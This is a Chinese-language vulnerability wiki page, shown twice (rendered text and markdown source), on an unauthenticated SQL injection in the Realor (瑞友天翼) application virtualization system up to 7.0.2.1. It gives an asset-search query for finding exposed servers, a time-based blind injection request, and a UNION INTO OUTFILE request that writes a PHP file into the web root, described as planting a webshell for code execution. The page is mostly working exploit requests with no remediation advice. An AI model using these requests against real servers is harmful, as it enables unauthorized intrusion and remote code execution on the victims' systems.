fofamini-wiki

登录白背景

源码

瑞友天翼应用虚拟化系统AgentBoard.XGI SQL注入漏洞

一、漏洞简介

瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权，基于服务器计算架构的应用虚拟化平台。它将用户各种应用软件集中部署在瑞友天翼服务器(群)上，客户端通过WEB即可快速安全的访问经服务器上授权的应用软件，实现集中应用、远程接入、协同办公等，从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。瑞友天翼应用虚拟化系统存在SQL注入漏洞，未经身份认证的远程攻击者可以利用该漏洞在目标系统上执行任意代码，（该漏洞是通过SQL注入写入后门文件进行代码执行）

二、影响版本

5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.2.1

三、资产测绘

hunterapp.name="REALOR 瑞友天翼虚拟化平台"
特征

四、漏洞复现

user参数存在SQL注入漏洞

/AgentBoard.XGI?user=1&cmd=UserLogin

GET /AgentBoard.XGI?user=1%27+AND+%28SELECT+8599+FROM+%28SELECT%28SLEEP%285%29%29%29ybrN%29+AND+%27NjRv%27%3D%27NjRv&cmd=UserLogin HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=h0r6todohj9kv8etikk8q7qb11; CookieLanguageName=ZH-CN
Upgrade-Insecure-Requests: 1

通过SQL注入漏洞写入webshell

GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5C2.php%22+--+-&cmd=UserLogin HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: CookieLanguageName=ZH-CN; CookieAuthType=0
Upgrade-Insecure-Requests: 1

写入文件位置

http://xx.xx.xx.xx/2.php

原文: https://www.yuque.com/xiaokp7/ocvun2/qzceubsk436m7vc6

# 瑞友天翼应用虚拟化系统AgentBoard.XGI SQL注入漏洞

# 一、漏洞简介
 瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权，基于服务器计算架构的应用虚拟化平台。它将用户各种应用软件集中部署在瑞友天翼服务器(群)上，客户端通过WEB即可快速安全的访问经服务器上授权的应用软件，实现集中应用、远程接入、协同办公等，从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。瑞友天翼应用虚拟化系统存在SQL注入漏洞，未经身份认证的远程攻击者可以利用该漏洞在目标系统上执行任意代码，（该漏洞是通过SQL注入写入后门文件进行代码执行）

# 二、影响版本

- 5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.2.1

# 三、资产测绘

- hunter`app.name="REALOR 瑞友天翼虚拟化平台"`
- 特征

![image.png](./img/Um7HR-tLmWUvTUJq/1694672983152-d1b99681-320f-4b53-ae8a-d0aa1466dd71-090847.png)

# 四、漏洞复现
user参数存在SQL注入漏洞
```
/AgentBoard.XGI?user=1&cmd=UserLogin
```
```
GET /AgentBoard.XGI?user=1%27+AND+%28SELECT+8599+FROM+%28SELECT%28SLEEP%285%29%29%29ybrN%29+AND+%27NjRv%27%3D%27NjRv&cmd=UserLogin HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=h0r6todohj9kv8etikk8q7qb11; CookieLanguageName=ZH-CN
Upgrade-Insecure-Requests: 1
```
![image.png](./img/Um7HR-tLmWUvTUJq/1694673085244-b3319c42-f85c-48b5-9de4-c1b871a91ab7-600827.png)
![image.png](./img/Um7HR-tLmWUvTUJq/1702462911047-3256116d-fc74-4a67-8cb7-f9b711bf9d3d-892032.png)
通过SQL注入漏洞写入webshell
```
GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5C2.php%22+--+-&cmd=UserLogin HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: CookieLanguageName=ZH-CN; CookieAuthType=0
Upgrade-Insecure-Requests: 1
```
![image.png](./img/Um7HR-tLmWUvTUJq/1694673272067-f4e34c6e-47de-4e03-88ac-5cfc3129aec5-603996.png)
写入文件位置
```
http://xx.xx.xx.xx/2.php
```
![image.png](./img/Um7HR-tLmWUvTUJq/1694673310526-a0adb732-e063-415d-9929-3b56a6c44a48-181717.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qzceubsk436m7vc6>